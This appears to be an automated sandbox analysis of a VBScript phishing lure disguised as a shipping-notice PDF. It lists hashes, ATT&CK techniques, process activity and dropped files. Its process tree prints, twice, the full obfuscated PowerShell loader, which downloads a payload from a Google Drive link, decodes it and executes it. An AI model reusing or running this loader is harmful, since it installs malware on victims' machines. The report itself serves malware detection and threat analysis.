c40b2c40c1c0e82ecb066104d4208dad25f3af04dff98a9463cfe5ed82707ef4

General

Target

Arrival Notice_AWB 4560943391_PDF.vbs
Size

29KB
MD5

592e05d52785ac7ce91bedee1bed070a
SHA1

fd7c461e71a467deaff4ef320482685347077943
SHA256

ff3261173380df6010b5f2fec463df92180220c8ae6631637937b097b73af3f1
SHA512

def9b1a31ccaa1942d7e0b0de4949bc94216aaf17622ec2de9c90b30e9cf50ae658da07e428985ae5a0aed60f9913937ed5fce5747d0ae61703894afbf3dc9c4
SSDEEP

384:YzMKK76JtZpa/CQnG5daT7K5NV3mMEMRtkRExJ:YzMKHJtZpa/lnZT2NxmMzk6

Score

8^/10

discovery

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	3244	WScript.exe
7	324	powershell.exe
9	324	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
7	drive.google.com
6	drive.google.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Time Discovery 1 TTPs 2 IoCs

Adversary may gather the system time and/or time zone settings from a local or remote system.

discovery

System Time Discovery

T1124

pid	Process
324	powershell.exe
4024	powershell.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
324	powershell.exe
324	powershell.exe
324	powershell.exe
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	324	powershell.exe
Token: SeDebugPrivilege	4024	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 3244 wrote to memory of 324	3244	WScript.exe	71
PID 3244 wrote to memory of 324	3244	WScript.exe	71
PID 324 wrote to memory of 2072	324	powershell.exe	73
PID 324 wrote to memory of 2072	324	powershell.exe	73
PID 324 wrote to memory of 4024	324	powershell.exe	75
PID 324 wrote to memory of 4024	324	powershell.exe	75
PID 324 wrote to memory of 4024	324	powershell.exe	75
PID 4024 wrote to memory of 3828	4024	powershell.exe	76
PID 4024 wrote to memory of 3828	4024	powershell.exe	76
PID 4024 wrote to memory of 3828	4024	powershell.exe	76

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Arrival Notice_AWB 4560943391_PDF.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:3244
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "write 'Emotionalization Polariteten Markedsadgang Amtssygehusene Overboil Diatherm Hyostylic212 frromantiske Unawkwardly Spiniferous zephyranthes adjection Unsittingly Forstudier185 Insapiency Kontoruddannet Salonkommunisten Fumy Bipolarises39 Opremsningen Fderalistens skvatmllen Unbackboarded boligtilsynsbestemmelse Emotionalization Polariteten Markedsadgang Amtssygehusene Overboil Diatherm Hyostylic212 frromantiske Unawkwardly Spiniferous zephyranthes adjection Unsittingly Forstudier185 Insapiency Kontoruddannet Salonkommunisten Fumy Bipolarises39 Opremsningen Fderalistens skvatmllen Unbackboarded boligtilsynsbestemmelse';If (${host}.CurrentCulture) {$Cardplayingmmun='SUBsTR';$Askegraa++;}$Cardplayingmmun+='ing';Function Alcmena($Praisable){$Eksamensprojektet=$Praisable.Length-$Askegraa;For( $Cardplaying=2;$Cardplaying -lt $Eksamensprojektet;$Cardplaying+=3){$Emotionalization+=$Praisable.$Cardplayingmmun.Invoke( $Cardplaying, $Askegraa);}$Emotionalization;}function Bloatedness($begyndelsesbogstaver){ & ($Snoldendes) ($begyndelsesbogstaver);}$Repercussor=Alcmena '.mM,ioBlzB,iAslPllDia.t/ .5Ak.P.0.i .u(AkWS.i n IdOroKlwF s Y UnNFyTLa T 1Il0 . n0To;Ka KrWViiT nCo6 E4 C;Ba Kx i6,e4 K;Kv Epr Av B:Be1,t2 1Bl.,u0 F)Pr BoG Sepuc VkTeoSj/je2An0Or1C.0 n0.o1 e0S 1Ou M,F .iAurKveRef,voRyxSk/Ao1B,2In1 K.B 0m. ';$Scaphandridae=Alcmena 'InUM.sUdeCrrVe-RiAMagcaeEmnVvtDr ';$Overboil=Alcmena 'TrhTet Rt SpBrs :Wr/ ,/Bad,erGeiHuv MeA .,igSloMio,rg Kl.oeJe..ic.roC.m E/bauDmc .?SpeUlx .pDeoStrVit =,vdBloryw Mn elAvo paAsdPo&SoiMedS.=No1BrvS.MNeY pmHyL.r7C hMuhAfs.oe,l3ChOfaVFi-Tr_As3.il.avBl5amxu,hBeBUnTDov,ojCuk esAnL.l0PrrScG ,GFl ';$Toreadorer=Alcmena 'In>Un ';$Snoldendes=Alcmena ' ,iOre.nx a ';$Komplementere='frromantiske';$Orthodoxism = Alcmena 'AnealcS,h .o,e P % MaAfpDipbidDea AtChaDe%Mm\ FFEso Cr PuBurOvePanKoiS nScgPrsKakDio.rnNoo ,mS iFoeStnResSt..vARekPut,e A & ,& S AdeC,c AhUnoF .t I ';Bloatedness (Alcmena ' G$c.g Kl Fo bS,a.plSk:MagR,rKeaGan BaSkdA.o =M (BocStmAnd.a me/ gc N U$ocO ,rUdtP.hTao bdInoRuxLai,isDem .) ');Bloatedness (Alcmena 'Re$NugSal ToBib AaFllT :HaA ,mAlt RsDesBey FgSheU.h buOusWae Pn .eE,=Te$ SO ,vQ,eRerFabTeoFoiDelR .kasvepSpl iSptUd(A.$AmTF,o,er ,e .a .dOvoChrDeeH.r.e)Vi ');Bloatedness (Alcmena ' .[ .NL,e.ut .HuSMueRerKavSyiSic Ae,aP Bo.gi MnAnt WM .aUhnHaaungBee r T] K: :OmSafeKoc .uM,rU i KtG,yMoP.irPooS.tU oC,cLeo,clLo T,=,t Bn[FjNs,e St U.,oSR,e McAau.orShiTrt yT PR,rOmoMit .o VcGeoW.l aT byPepK.e.a]Le:J,:OpTS l is e1Ny2,m ');$Overboil=$Amtssygehusene[0];$Antimediaevally= (Alcmena ' C$ ,gColInokdbScaFjlM :InNMar ,sBlyP,nPhe StTrhSheCod ,s.e=E,N .e.hwA -FrOF,bChjd e scU.t C n SClyYasFrtKoeOvmEm.RoNUneuntBa.BaW e UbEuC l ri Ge n t');$Antimediaevally+=$granado[1];Bloatedness ($Antimediaevally);Bloatedness (Alcmena 'Re$RaN ,rBasBryAvnSmeaptRehSheBydA sbr.TwH ZeApaBod DeSerDisLy[.n$LuSF.c,ta CpBlhSnaGanStdStrEniWodBaa nep ]Ge=Ve$,rR ieHip,ue DrPrcHeuKls is roT rUp ');$Towers=Alcmena ',a$TiNDer sK,yStnKve Pt ThEpe PdF.s C.LaD Ro sw,unCrlB.oDiaNud.xF .i ElSie .(Fa$,eOSkvIse r Eb VoTyiTel .,Di$ s gk bvA.a tComv lNalChe Sn P) O ';$skvatmllen=$granado[0];Bloatedness (Alcmena ' a$OugB lFro bHaaB.lD,:EjMS.aKrd,ir,iaStsCyiGe=In( HTMeeStsSktG,-.sPChaSitKrhSk Ti$PaslikHjv aC t BmBulVel .eAdnPl)Na ');while (!$Madrasi) {Bloatedness (Alcmena ' ,$TagLelCeoWib,raPllDe:RobRarLouH,n Pe tTv=Fo$Opt rSpuFrePy ') ;Bloatedness $Towers;Bloatedness (Alcmena 'caSDet LagarOvtB,- TS lPeeN,e.vpGa .r4.m ');Bloatedness (Alcmena '.n$FigOdlNeoNab ,a l c:T MFaaD,dSirMaaTasS iAg=Di(KiTPre osM.tG,- APDaaKrt Nh t H $Rhs.nkL,vsta PtLnm Pli lPoe.lnL.) ') ;Bloatedness (Alcmena 'U,$AcgBelOmo Wb BaDulCh:T.M ua Grenk yeFod UsHya Od ogA.aScnUng k=ge$.pg AlB o Db,oa lPe: .PGaoKjlBlaFrrDiiSktviesuth,eStnMa+ B+Vi%Fo$ MA.rmT t,rs ,s,iyWig.te GhTeu TsSkeStnFle .L cHeo RuS n,etKa ') ;$Overboil=$Amtssygehusene[$Markedsadgang];}$Voksenundervisning=295672;$Trodsedes=27606;Bloatedness (Alcmena 'Mu$,igtulChoFobtaaiol A:B UE.nKrai.wHekW.wUnaElrZedu lBlyT, A =N. ExGDeeMetfi-I.C EoStnmatSte YnIntAr .a$SksDak ivNeaDyt.emL,l dl IeamnJo ');Bloatedness (Alcmena 'A,$,og,al ,oL,bchaA lAl:oxBperFoaKuu dn aa.t Sp=Pr Fl[,rS ,y,rs NtUne,imt..GrCCro cnR vFoeUnrPet o],e: S:SvF Vrt oP.mFoB,ia Usove K6Ma4LeS .tE,rFii n ogOc(di$ FU.vn ,a IwWik .wS,aLgr.rdSil rySe) T ');Bloatedness (Alcmena ' g$EmgEnlFao.yb AaAgl S:Toas.d,ajAre,icDet DiTno,an.e .o=Pe Br[ReS yWhsUdtEleCrmFj.noT.ye Ex atBr.PaE rn .c ,o sdMiiG,n,vgPr] e: :omATrS KC .I uIE..RaG OeFatHeSPatR rL,iFanK gIn(Vo$FuBVarUnaPyuU nOuaBe),a ');Bloatedness (Alcmena 'R,$OcgGul.noPtbUnaGol B:.aE .f.at retrr,ra aC.r As Tj .vMinUnd,ogE nShsTo= S$Doa NdArjZeeB.cI t,oiIno .nGy.Ans.ou ib PsCotSnrVoiCanvegAn(Fi$ DV To CkTes,oeMan VuManUddUneInrG.vOpiRes nn.aiC.nPag ,,De$P.T ,rNao FdInsDuedidTreUdsB.) F ');Bloatedness $Efteraarsjvndgns;"
  2⤵
  - Blocklisted process makes network request
  - System Time Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:324
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Forureningskonomiens.Akt && echo t"
    3⤵
    PID:2072
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "write 'Emotionalization Polariteten Markedsadgang Amtssygehusene Overboil Diatherm Hyostylic212 frromantiske Unawkwardly Spiniferous zephyranthes adjection Unsittingly Forstudier185 Insapiency Kontoruddannet Salonkommunisten Fumy Bipolarises39 Opremsningen Fderalistens skvatmllen Unbackboarded boligtilsynsbestemmelse Emotionalization Polariteten Markedsadgang Amtssygehusene Overboil Diatherm Hyostylic212 frromantiske Unawkwardly Spiniferous zephyranthes adjection Unsittingly Forstudier185 Insapiency Kontoruddannet Salonkommunisten Fumy Bipolarises39 Opremsningen Fderalistens skvatmllen Unbackboarded boligtilsynsbestemmelse';If (${host}.CurrentCulture) {$Cardplayingmmun='SUBsTR';$Askegraa++;}$Cardplayingmmun+='ing';Function Alcmena($Praisable){$Eksamensprojektet=$Praisable.Length-$Askegraa;For( $Cardplaying=2;$Cardplaying -lt $Eksamensprojektet;$Cardplaying+=3){$Emotionalization+=$Praisable.$Cardplayingmmun.Invoke( $Cardplaying, $Askegraa);}$Emotionalization;}function Bloatedness($begyndelsesbogstaver){ & ($Snoldendes) ($begyndelsesbogstaver);}$Repercussor=Alcmena '.mM,ioBlzB,iAslPllDia.t/ .5Ak.P.0.i .u(AkWS.i n IdOroKlwF s Y UnNFyTLa T 1Il0 . n0To;Ka KrWViiT nCo6 E4 C;Ba Kx i6,e4 K;Kv Epr Av B:Be1,t2 1Bl.,u0 F)Pr BoG Sepuc VkTeoSj/je2An0Or1C.0 n0.o1 e0S 1Ou M,F .iAurKveRef,voRyxSk/Ao1B,2In1 K.B 0m. ';$Scaphandridae=Alcmena 'InUM.sUdeCrrVe-RiAMagcaeEmnVvtDr ';$Overboil=Alcmena 'TrhTet Rt SpBrs :Wr/ ,/Bad,erGeiHuv MeA .,igSloMio,rg Kl.oeJe..ic.roC.m E/bauDmc .?SpeUlx .pDeoStrVit =,vdBloryw Mn elAvo paAsdPo&SoiMedS.=No1BrvS.MNeY pmHyL.r7C hMuhAfs.oe,l3ChOfaVFi-Tr_As3.il.avBl5amxu,hBeBUnTDov,ojCuk esAnL.l0PrrScG ,GFl ';$Toreadorer=Alcmena 'In>Un ';$Snoldendes=Alcmena ' ,iOre.nx a ';$Komplementere='frromantiske';$Orthodoxism = Alcmena 'AnealcS,h .o,e P % MaAfpDipbidDea AtChaDe%Mm\ FFEso Cr PuBurOvePanKoiS nScgPrsKakDio.rnNoo ,mS iFoeStnResSt..vARekPut,e A & ,& S AdeC,c AhUnoF .t I ';Bloatedness (Alcmena ' G$c.g Kl Fo bS,a.plSk:MagR,rKeaGan BaSkdA.o =M (BocStmAnd.a me/ gc N U$ocO ,rUdtP.hTao bdInoRuxLai,isDem .) ');Bloatedness (Alcmena 'Re$NugSal ToBib AaFllT :HaA ,mAlt RsDesBey FgSheU.h buOusWae Pn .eE,=Te$ SO ,vQ,eRerFabTeoFoiDelR .kasvepSpl iSptUd(A.$AmTF,o,er ,e .a .dOvoChrDeeH.r.e)Vi ');Bloatedness (Alcmena ' .[ .NL,e.ut .HuSMueRerKavSyiSic Ae,aP Bo.gi MnAnt WM .aUhnHaaungBee r T] K: :OmSafeKoc .uM,rU i KtG,yMoP.irPooS.tU oC,cLeo,clLo T,=,t Bn[FjNs,e St U.,oSR,e McAau.orShiTrt yT PR,rOmoMit .o VcGeoW.l aT byPepK.e.a]Le:J,:OpTS l is e1Ny2,m ');$Overboil=$Amtssygehusene[0];$Antimediaevally= (Alcmena ' C$ ,gColInokdbScaFjlM :InNMar ,sBlyP,nPhe StTrhSheCod ,s.e=E,N .e.hwA -FrOF,bChjd e scU.t C n SClyYasFrtKoeOvmEm.RoNUneuntBa.BaW e UbEuC l ri Ge n t');$Antimediaevally+=$granado[1];Bloatedness ($Antimediaevally);Bloatedness (Alcmena 'Re$RaN ,rBasBryAvnSmeaptRehSheBydA sbr.TwH ZeApaBod DeSerDisLy[.n$LuSF.c,ta CpBlhSnaGanStdStrEniWodBaa nep ]Ge=Ve$,rR ieHip,ue DrPrcHeuKls is roT rUp ');$Towers=Alcmena ',a$TiNDer sK,yStnKve Pt ThEpe PdF.s C.LaD Ro sw,unCrlB.oDiaNud.xF .i ElSie .(Fa$,eOSkvIse r Eb VoTyiTel .,Di$ s gk bvA.a tComv lNalChe Sn P) O ';$skvatmllen=$granado[0];Bloatedness (Alcmena ' a$OugB lFro bHaaB.lD,:EjMS.aKrd,ir,iaStsCyiGe=In( HTMeeStsSktG,-.sPChaSitKrhSk Ti$PaslikHjv aC t BmBulVel .eAdnPl)Na ');while (!$Madrasi) {Bloatedness (Alcmena ' ,$TagLelCeoWib,raPllDe:RobRarLouH,n Pe tTv=Fo$Opt rSpuFrePy ') ;Bloatedness $Towers;Bloatedness (Alcmena 'caSDet LagarOvtB,- TS lPeeN,e.vpGa .r4.m ');Bloatedness (Alcmena '.n$FigOdlNeoNab ,a l c:T MFaaD,dSirMaaTasS iAg=Di(KiTPre osM.tG,- APDaaKrt Nh t H $Rhs.nkL,vsta PtLnm Pli lPoe.lnL.) ') ;Bloatedness (Alcmena 'U,$AcgBelOmo Wb BaDulCh:T.M ua Grenk yeFod UsHya Od ogA.aScnUng k=ge$.pg AlB o Db,oa lPe: .PGaoKjlBlaFrrDiiSktviesuth,eStnMa+ B+Vi%Fo$ MA.rmT t,rs ,s,iyWig.te GhTeu TsSkeStnFle .L cHeo RuS n,etKa ') ;$Overboil=$Amtssygehusene[$Markedsadgang];}$Voksenundervisning=295672;$Trodsedes=27606;Bloatedness (Alcmena 'Mu$,igtulChoFobtaaiol A:B UE.nKrai.wHekW.wUnaElrZedu lBlyT, A =N. ExGDeeMetfi-I.C EoStnmatSte YnIntAr .a$SksDak ivNeaDyt.emL,l dl IeamnJo ');Bloatedness (Alcmena 'A,$,og,al ,oL,bchaA lAl:oxBperFoaKuu dn aa.t Sp=Pr Fl[,rS ,y,rs NtUne,imt..GrCCro cnR vFoeUnrPet o],e: S:SvF Vrt oP.mFoB,ia Usove K6Ma4LeS .tE,rFii n ogOc(di$ FU.vn ,a IwWik .wS,aLgr.rdSil rySe) T ');Bloatedness (Alcmena ' g$EmgEnlFao.yb AaAgl S:Toas.d,ajAre,icDet DiTno,an.e .o=Pe Br[ReS yWhsUdtEleCrmFj.noT.ye Ex atBr.PaE rn .c ,o sdMiiG,n,vgPr] e: :omATrS KC .I uIE..RaG OeFatHeSPatR rL,iFanK gIn(Vo$FuBVarUnaPyuU nOuaBe),a ');Bloatedness (Alcmena 'R,$OcgGul.noPtbUnaGol B:.aE .f.at retrr,ra aC.r As Tj .vMinUnd,ogE nShsTo= S$Doa NdArjZeeB.cI t,oiIno .nGy.Ans.ou ib PsCotSnrVoiCanvegAn(Fi$ DV To CkTes,oeMan VuManUddUneInrG.vOpiRes nn.aiC.nPag ,,De$P.T ,rNao FdInsDuedidTreUdsB.) F ');Bloatedness $Efteraarsjvndgns;"
    3⤵
    - System Location Discovery: System Language Discovery
    - System Time Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4024
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Forureningskonomiens.Akt && echo t"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3828

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

System Time Discovery

1

T1124

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2sxjldt3.vhj.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\Forureningskonomiens.Akt

Filesize
420KB

MD5
8dedf31a9ddcc727db8c1c7f42074980

SHA1
2e027edef136505bb0f62347dda5d10611fe434f

SHA256
548990f3282f20086d8b67f93b83b3068e12204ad13450b784b06bbad05406f4

SHA512
17ec95dc43d573cbaa0d991a6c30499b9aefb3edb69bef225515a981500a034d0a13179178c3d697e904a57e34f0b04cac95b949d27b0c00f8999cd4c2a99f92

Download Submit
memory/324-6-0x00007FF862F13000-0x00007FF862F14000-memory.dmp

Filesize
4KB

Download
memory/324-9-0x000002EDD5A30000-0x000002EDD5A52000-memory.dmp

Filesize
136KB

Download
memory/324-12-0x00007FF862F10000-0x00007FF8638FC000-memory.dmp

Filesize
9.9MB

Download
memory/324-13-0x000002EDD5BE0000-0x000002EDD5C56000-memory.dmp

Filesize
472KB

Download
memory/324-14-0x00007FF862F10000-0x00007FF8638FC000-memory.dmp

Filesize
9.9MB

Download
memory/324-33-0x00007FF862F10000-0x00007FF8638FC000-memory.dmp

Filesize
9.9MB

Download
memory/324-76-0x00007FF862F10000-0x00007FF8638FC000-memory.dmp

Filesize
9.9MB

Download
memory/324-75-0x00007FF862F13000-0x00007FF862F14000-memory.dmp

Filesize
4KB

Download
memory/4024-43-0x0000000007DB0000-0x0000000008100000-memory.dmp

Filesize
3.3MB

Download
memory/4024-62-0x0000000009310000-0x000000000932A000-memory.dmp

Filesize
104KB

Download
memory/4024-41-0x0000000007BF0000-0x0000000007C56000-memory.dmp

Filesize
408KB

Download
memory/4024-44-0x0000000007D20000-0x0000000007D3C000-memory.dmp

Filesize
112KB

Download
memory/4024-45-0x0000000008680000-0x00000000086CB000-memory.dmp

Filesize
300KB

Download
memory/4024-46-0x0000000008490000-0x0000000008506000-memory.dmp

Filesize
472KB

Download
memory/4024-61-0x0000000009BF0000-0x000000000A268000-memory.dmp

Filesize
6.5MB

Download
memory/4024-42-0x0000000007D40000-0x0000000007DA6000-memory.dmp

Filesize
408KB

Download
memory/4024-67-0x0000000009690000-0x0000000009724000-memory.dmp

Filesize
592KB

Download
memory/4024-68-0x0000000009640000-0x0000000009662000-memory.dmp

Filesize
136KB

Download
memory/4024-69-0x000000000A770000-0x000000000AC6E000-memory.dmp

Filesize
5.0MB

Download
memory/4024-40-0x0000000007410000-0x0000000007432000-memory.dmp

Filesize
136KB

Download
memory/4024-39-0x00000000074C0000-0x0000000007AE8000-memory.dmp

Filesize
6.2MB

Download
memory/4024-38-0x00000000049C0000-0x00000000049F6000-memory.dmp

Filesize
216KB

Download
memory/4024-115-0x000000000AC70000-0x000000000CB3B000-memory.dmp

Filesize
30.8MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads